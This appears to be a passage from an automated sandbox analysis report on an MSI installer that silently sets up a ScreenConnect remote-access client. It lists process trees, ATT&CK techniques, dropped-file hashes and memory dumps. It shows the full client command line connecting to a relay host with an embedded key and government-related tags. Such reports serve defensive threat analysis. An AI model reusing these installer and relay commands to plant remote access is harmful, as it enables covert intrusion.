2480	msiexec.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe

Suspicious use of SendNotifyMessage 16 IoCs

pid	Process
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe
968	ScreenConnect.WindowsClient.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 2796 wrote to memory of 2864	2796	msiexec.exe	31
PID 2796 wrote to memory of 2864	2796	msiexec.exe	31
PID 2796 wrote to memory of 2864	2796	msiexec.exe	31
PID 2796 wrote to memory of 2864	2796	msiexec.exe	31
PID 2796 wrote to memory of 2864	2796	msiexec.exe	31
PID 2796 wrote to memory of 2864	2796	msiexec.exe	31
PID 2796 wrote to memory of 2864	2796	msiexec.exe	31
PID 2864 wrote to memory of 2696	2864	MsiExec.exe	32
PID 2864 wrote to memory of 2696	2864	MsiExec.exe	32
PID 2864 wrote to memory of 2696	2864	MsiExec.exe	32
PID 2864 wrote to memory of 2696	2864	MsiExec.exe	32
PID 2864 wrote to memory of 2696	2864	MsiExec.exe	32
PID 2864 wrote to memory of 2696	2864	MsiExec.exe	32
PID 2864 wrote to memory of 2696	2864	MsiExec.exe	32
PID 2228 wrote to memory of 2220	2228	vssvc.exe	35
PID 2228 wrote to memory of 2220	2228	vssvc.exe	35
PID 2228 wrote to memory of 2220	2228	vssvc.exe	35
PID 2796 wrote to memory of 2024	2796	msiexec.exe	38
PID 2796 wrote to memory of 2024	2796	msiexec.exe	38
PID 2796 wrote to memory of 2024	2796	msiexec.exe	38
PID 2796 wrote to memory of 2024	2796	msiexec.exe	38
PID 2796 wrote to memory of 2024	2796	msiexec.exe	38
PID 2796 wrote to memory of 2024	2796	msiexec.exe	38
PID 2796 wrote to memory of 2024	2796	msiexec.exe	38
PID 2796 wrote to memory of 2176	2796	msiexec.exe	39
PID 2796 wrote to memory of 2176	2796	msiexec.exe	39
PID 2796 wrote to memory of 2176	2796	msiexec.exe	39
PID 2796 wrote to memory of 2176	2796	msiexec.exe	39
PID 2796 wrote to memory of 2176	2796	msiexec.exe	39
PID 2796 wrote to memory of 2176	2796	msiexec.exe	39
PID 2796 wrote to memory of 2176	2796	msiexec.exe	39
PID 2524 wrote to memory of 968	2524	ScreenConnect.ClientService.exe	41
PID 2524 wrote to memory of 968	2524	ScreenConnect.ClientService.exe	41
PID 2524 wrote to memory of 968	2524	ScreenConnect.ClientService.exe	41
PID 2524 wrote to memory of 968	2524	ScreenConnect.ClientService.exe	41

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\ac34e44a897a626c34db1c18efcf707fc1d5473a46117586649f31f53c28496a.msi
1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2480

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2796
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A3A0343CDC1B6343F527E9E9C1C0FCB6 C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2864
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI534E.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259412908 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2696
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 7DF1B756185CC06EF3318E54E179A738
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2024
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 89A8DF665191225230D081DC290F93D9 M Global\MSI0000
  2⤵
  - Drops file in Windows directory
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2176

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:2228
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 2228 -s 524
  2⤵
  PID:2220

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1440

C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "000000000000049C" "00000000000005A4"
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1344

C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-s1t9su-relay.screenconnect.com&p=443&s=c408c6ab-66e0-49ac-accd-52b8204cdb5f&k=BgIAAACkAABSU0ExAAgAAAEAAQAZhsU%2bP4UE5AtDTMSFWho25Rl9VjYF8BVBXNwYvU7ugYYwP08h0Z%2fmsf3hdTZqjWU0kI2j8SYjcPTHlmm1DVR4w%2bCnc6S9OaDbDbVnmTAZb4aLnlE0C%2bxZGL%2fgLPE0QdK9YGD5fWjCXXAGAq8z6%2fnmyvLLDh70j0hHGeffkk6HXpjl9E61RXxiCCy3wJleuhdWVSz2TYOAsya%2fs6TEOncLxRX5dVsIpVQHwe%2bApMXuapOWQ1kSv%2bZ0liWHcxZnDeQOpXfTGKLGsTXT3yFLz2B3W33laNnlW%2fpN5y3LSz9plPy4pGcwqi%2bgQpv6KqQ%2b4n55foFDpc6%2fFyuAI8vGWA2l&c=government&c=gov.al&c=it&c=pc&c=&c=&c=&c="
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2524
- C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.WindowsClient.exe" "RunRole" "e01b2270-dda4-4106-9262-0cfd678358a2" "User"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Installer Packages

T1546.016

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Installer Packages

T1546.016

Defense Evasion

Modify Registry

T1112

System Binary Proxy Execution

T1218

Msiexec

T1218.007

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\f765b4c.rbs

Filesize
212KB

MD5
cbcf48370c4291e839d2c04164c9622f

SHA1
b2d261e60de2d29c4c70f9aaa14ee0455f63263a

SHA256
6d007daac62c09b40371e3bb77db3efafd461a6483700023e727c729c6445eca

SHA512
f137c58fdf6a572f176a0f07bf100fb25adffbbefa878c66c9275b4db9ac2b69cdb351495ed2d73fb15398e065f1c8a967bc20ae7cd56c4e37c2457f20d8d32d

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\Client.en-US.resources

Filesize
47KB

MD5
26f4eb71380f8e033c74ed8c57d0ad9d

SHA1
d94252e86215a4a2e29f081cecd335d48bbd7a9c

SHA256
179b6d08519b3e56dce0cc0096f31e9751d74b7875e030a3b2d01c189be0108d

SHA512
8d36cad523e6847d055caa35535388008633187078c55625f32548016ffd2ba9f5528fe2df2c97d6c9e3e08ac432f8156d59da334acfec4142a44b4a4421a897

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\Client.resources

Filesize
26KB

MD5
5cd580b22da0c33ec6730b10a6c74932

SHA1
0b6bded7936178d80841b289769c6ff0c8eead2d

SHA256
de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c

SHA512
c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.Client.dll

Filesize
188KB

MD5
ca2857bac072baec93fbf23e5fcff956

SHA1
049f21dfe97f5dc247b0c7a29e22111dc4c63aad

SHA256
04a6ba13d7f014c6650a05c55f7fef2d465903ab900bc37a2a28f4bf08a658c0

SHA512
96bdfe18334b9837223da8ebb7f671abde9559f6e5150854025315bcccc09133c50939cb0e62ff16219d45b77711baa3c3c278edacda4584960e9c06e63e20f1

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.ClientService.dll

Filesize
59KB

MD5
a9d86db5d9c735d6dcc83e979ab64a7d

SHA1
e4f945e799d9bf5fc103f65d8ca832290b5ab03c

SHA256
083eb9b90e04e39514c50e296593c3652f05cf3fe3ba41cb7adeed82930e4ddf

SHA512
ceceeea84b266ca389562fcbbc4fa24bb4b44093289b0a67e60bf4506c2a554087fb2ee9ee607e29efb8912a26ce65c3457a14c23c4d742181b3795a3a6338b4

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.ClientService.exe

Filesize
93KB

MD5
89d3d099b6d8731bd1b7f5a68b5bf17c

SHA1
c6aed886840aafd08796207e2646d8805d012b81

SHA256
bcaa3d8dcba6ba08bf20077eadd0b31f58a1334b7b9c629e475694c4eeafd924

SHA512
6cb52828006ef2d41b9acc2a8a8e84b2d5f0bee0304cc8762d5945a1e21023373371893a261d089599799ebe89cbe0da5327ee80d5db07a936727ea21fb0951a

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.Windows.dll

Filesize
1.6MB

MD5
44b736a074b7e0bbe0c6c5f7debe0f3d

SHA1
a1c063d652908b663a5e2d12c81c7a74b1f7b7e2

SHA256
f8c648e09fb42f145b581ed80b2a0c88e9f18041efd03ad3187a6229f17a14b8

SHA512
de0258dcbe6886e8c8e0b6188f6427cd2b650a80b16cd11349e3f8332af906b47d79c5714fd734df5866923735bda1e0a448c2b18dac2102464f2f237d97c37a

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.WindowsClient.exe.config

Filesize
266B

MD5
728175e20ffbceb46760bb5e1112f38b

SHA1
2421add1f3c9c5ed9c80b339881d08ab10b340e3

SHA256
87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

SHA512
fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.WindowsCredentialProvider.dll

Filesize
746KB

MD5
f01a59c5cf7ec437097d414d7c6d59c4

SHA1
9ea1c3fbf3b5adbe5a23578dea3b511d44e6a2dd

SHA256
62b405f32a43da0c8e8ed14a58ec7b9b4422b154bfd4aed4f9be5de0bc6eb5e8

SHA512
587748ad4dd18677a3b7943eab1c0f8e77fe50a45e17266ba9a0e1363eda0ff1eabcf11884a5d608e23baf86af8f011db745ad06bcdecdfd01c20430745fe4bb

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\system.config

Filesize
970B

MD5
ca804d47bcb02664a31fa8ec17d16793

SHA1
7a01687b36263ad5169ae53c421afc28fb519a64

SHA256
bf61fdbdc3db66c762cca24d0e06a533063b1912dbd6a83807457bd37e65befd

SHA512
24e42453d5d075f936f022c02b3066bf41a9a97a33dbec14c7f111898aec88c08bfd9a9e9f1126ecb0f9f8e31b40eb73637d6314117230ec85e47183c620bba7

Download Submit
C:\Windows\Installer\MSI75DC.tmp

Filesize
202KB

MD5
ba84dd4e0c1408828ccc1de09f585eda

SHA1
e8e10065d479f8f591b9885ea8487bc673301298

SHA256
3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852

SHA512
7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290

Download Submit
C:\Windows\Installer\f765b4a.msi

Filesize
7.3MB

MD5
6086601a8560a2037f5091d8632d0509

SHA1
2a7203ea36b649e95f42a2cf0fcf38347d0a7640

SHA256
ac34e44a897a626c34db1c18efcf707fc1d5473a46117586649f31f53c28496a

SHA512
554fb256c1be49942c3c1b2cf1620c8d364a9fa52de7471808ba282019f87703980c9213045123fa5406916bc2e6e60fe963950d4916c622b1edd1f14032864a

Download Submit
\Program Files (x86)\ScreenConnect Client (d8713efd2a06052f)\ScreenConnect.WindowsClient.exe

Filesize
572KB

MD5
19e093bc974d1ed6399f50b7fa3be1f8

SHA1
11e0b01858dc2ed0d1b5854ebeb09a332a36ed93

SHA256
ea38cff329692f6b4c8ade15970b742a9a8bb62a44f59227c510cb2882fa436f

SHA512
d2e4c543ddf850b5c54d2de5dea03de77fdb4a852a377b0e35146e733cfd1cb198a8afc88cb55fed20e87ac6ae7ed8ea0198f0049a0fc400615ac32bb153cc6a

Download Submit
\Users\Admin\AppData\Local\Temp\MSI534E.tmp

Filesize
1015KB

MD5
5c1b123df7123061ca1f1cdb31ce36cb

SHA1
1421db694e8c2a3af066d6317282157d2c05e3b6

SHA256
d40ae98a7d18c2c35c0355984340b0517be47257c000931093a4fc3ccc90c226

SHA512
866979a543ac413dbeadce82e9ab35ffe5f4d0f69fc61ef2c4f8761030a126abfab4db053669df7e7a602e3753842a7315c17881d2a333d0abea51d8ef3041e8

Download Submit
\Users\Admin\AppData\Local\Temp\MSI534E.tmp-\Microsoft.Deployment.WindowsInstaller.dll

Filesize
172KB

MD5
5ef88919012e4a3d8a1e2955dc8c8d81

SHA1
c0cfb830b8f1d990e3836e0bcc786e7972c9ed62

SHA256
3e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d

SHA512
4544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684

Download Submit
\Users\Admin\AppData\Local\Temp\MSI534E.tmp-\ScreenConnect.Core.dll

Filesize
518KB

MD5
469a702d0861e2c63e6e6e575c58e399

SHA1
06cf299c7dc7867c9584647f5ba681aec6c469d4

SHA256
affb342d2dce754b4ddbeeb4ed344806fda531d68346df12629b7bd8c0fa753c

SHA512
90fa0f0bbb3076f770354fc6f870c302c2c3a7e2ea010dc451cbd4dd0d417aa360f57ddfe003ea634efa38a7e34b63236ffe1addb4738fac16cff798c940b016

Download Submit
\Users\Admin\AppData\Local\Temp\MSI534E.tmp-\ScreenConnect.InstallerActions.dll

Filesize
21KB

MD5
41e8c80a7f1bf4911fce55c0de249302

SHA1
21d6f8ddc242a55c4894127bbef0479fea1d6847

SHA256
569b267d8c4cef1b26c9337f5a355f0040ad4d7e9610f28784e4af05efa3e4e9

SHA512
d2f375e9956d46db0fc4e0162ea894ad8598512a3de93537579ddcd8872fc8160751a4ada37bbc9f61b78414e5d241dfb2e036f2200bff4de70ac1a417aaa240

Download Submit
memory/968-113-0x0000000000270000-0x0000000000286000-memory.dmp

Filesize
88KB

Download
memory/968-112-0x0000000000160000-0x0000000000176000-memory.dmp

Filesize
88KB

Download
memory/968-111-0x000000001AFC0000-0x000000001B168000-memory.dmp

Filesize
1.7MB

Download
memory/968-110-0x0000000000620000-0x00000000006A8000-memory.dmp

Filesize
544KB

Download
memory/968-109-0x0000000000440000-0x0000000000476000-memory.dmp

Filesize
216KB

Download
memory/968-108-0x00000000002A0000-0x0000000000334000-memory.dmp

Filesize
592KB

Download
memory/2524-100-0x00000000010A0000-0x000000000115E000-memory.dmp

Filesize
760KB

Download
memory/2524-74-0x0000000000AE0000-0x0000000000B68000-memory.dmp

Filesize
544KB

Download
memory/2524-98-0x0000000000DC0000-0x0000000000DF6000-memory.dmp

Filesize
216KB

Download
memory/2524-67-0x00000000002E0000-0x00000000002F6000-memory.dmp

Filesize
88KB

Download
memory/2524-70-0x00000000002E0000-0x00000000002F6000-memory.dmp

Filesize
88KB

Download
memory/2524-78-0x00000000039D0000-0x0000000003B78000-memory.dmp

Filesize
1.7MB

Download
memory/2696-19-0x0000000000B90000-0x0000000000B9C000-memory.dmp

Filesize
48KB

Download
memory/2696-23-0x0000000004D60000-0x0000000004DE8000-memory.dmp

Filesize
544KB

Download
memory/2696-15-0x0000000000B50000-0x0000000000B7E000-memory.dmp

Filesize
184KB

Download